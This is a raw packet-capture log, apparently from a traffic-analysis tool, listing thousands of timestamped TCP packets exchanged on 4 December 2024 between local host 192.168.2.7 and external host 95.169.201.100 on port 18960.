                                                                                                                                                                                                        Dec 4, 2024 13:53:16.989989042 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.990705013 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.990757942 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.990813971 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.990859032 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.991646051 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.991740942 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.992491961 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.992552042 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.992600918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.992654085 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.993369102 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.993489981 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.994227886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.994288921 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.994421959 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.994473934 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.995270014 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.995368958 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.995562077 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.995943069 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.996025085 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.996676922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.996752977 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.996768951 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.996810913 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997158051 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997231007 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997746944 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997790098 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997824907 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.997836113 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.998543978 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.998646975 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.998699903 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.999706984 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:16.999780893 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.000211954 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.000263929 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.000307083 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.000349045 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.001028061 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.001144886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.001633883 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.001852989 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.002001047 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.002671957 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.002721071 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.002784014 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.002882004 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.003515959 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.003643990 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.004334927 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.004443884 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.004513025 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.004568100 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.005162001 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.005311012 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006002903 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006072998 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006109953 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006159067 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006843090 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.006928921 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.007560968 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.072279930 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.087630987 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.087729931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.087790012 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.087991953 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.088088989 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.088200092 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.088947058 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.089168072 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.089211941 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.089730978 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.089840889 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.089931011 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.090492964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.090591908 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.090670109 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.091288090 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.091409922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.091456890 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.092469931 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.092552900 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.092593908 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.093107939 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.093209028 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.093281984 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.093852043 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.093997955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.094058990 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.094635963 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.094782114 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.094907999 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.095417023 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.095539093 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.095571995 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.096297979 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.096414089 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.096451044 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.097058058 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.097170115 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.097218990 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.097956896 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.098052025 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.098100901 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.098737001 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.098831892 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.098912001 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.099781036 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.099987030 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.100054979 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.100624084 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.100686073 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.100739002 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.101280928 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.101408005 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.101461887 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.102039099 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.102148056 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.102190971 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.103216887 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.103321075 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.103396893 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104024887 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104160070 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104250908 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104852915 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104906082 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.104959011 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.105532885 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.105632067 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.105674982 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.106201887 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.175590038 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.175632954 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.175656080 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176230907 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176276922 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176393986 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176774025 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176816940 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.176820040 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.177479982 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.177537918 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.177561045 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.178313017 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.178359985 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.178416967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.179122925 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.179163933 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.179353952 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.180027008 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.180068016 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.180099010 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.180995941 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.181046963 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.181070089 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.181595087 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.181674957 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.181698084 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.182663918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.182719946 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.182838917 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.183712006 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.183739901 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.183918953 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.184449911 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.184489965 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.184551001 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.185394049 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.185441971 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.185528040 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.186461926 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.186506033 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.186527967 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.187359095 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.187407970 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.187443018 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188121080 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188174009 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188220978 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188808918 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188858032 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.188910007 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.189668894 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.189709902 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.189726114 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.190566063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.190629005 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.190665960 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.191430092 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.191474915 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.191523075 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192076921 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192131996 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192142010 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192675114 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192749023 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.192764997 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.193316936 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.193361998 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.193413019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.193998098 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.194037914 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.194098949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.194782019 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.194827080 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.194892883 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.195658922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.195698977 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.195774078 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.196496964 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.196547031 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.196583986 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.197263002 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.197302103 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.197360039 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.198108912 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.198149920 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.198214054 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.198930979 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.198973894 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.199045897 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.275417089 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.279400110 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.279620886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.279803038 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.279851913 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.280000925 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.280154943 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.280203104 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.280225992 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.281018972 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.281112909 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.281199932 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.281924963 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.281985044 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.282181025 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.282636881 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.282707930 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.282763004 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.283442974 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.283524990 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.283549070 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.284246922 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.284313917 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.284363031 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.285125017 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.285172939 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.285352945 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.285928965 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.285978079 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.286197901 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.286839008 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.286889076 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.286906004 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.287545919 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.287589073 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.287637949 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.288403988 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.288465023 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.288506031 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.289267063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.289304018 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.289397955 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.290082932 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.290157080 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.290215015 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.290847063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.290890932 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.291062117 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292085886 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292133093 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292196989 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292511940 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292607069 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.292618990 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.293410063 CET189604970195.169.201.100192.168.2.7
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.293466091 CET4970118960192.168.2.795.169.201.100
                                                                                                                                                                                                        Dec 4, 2024 13:53:17.293526888 CET189604970195.169.201.100192.168.2.7
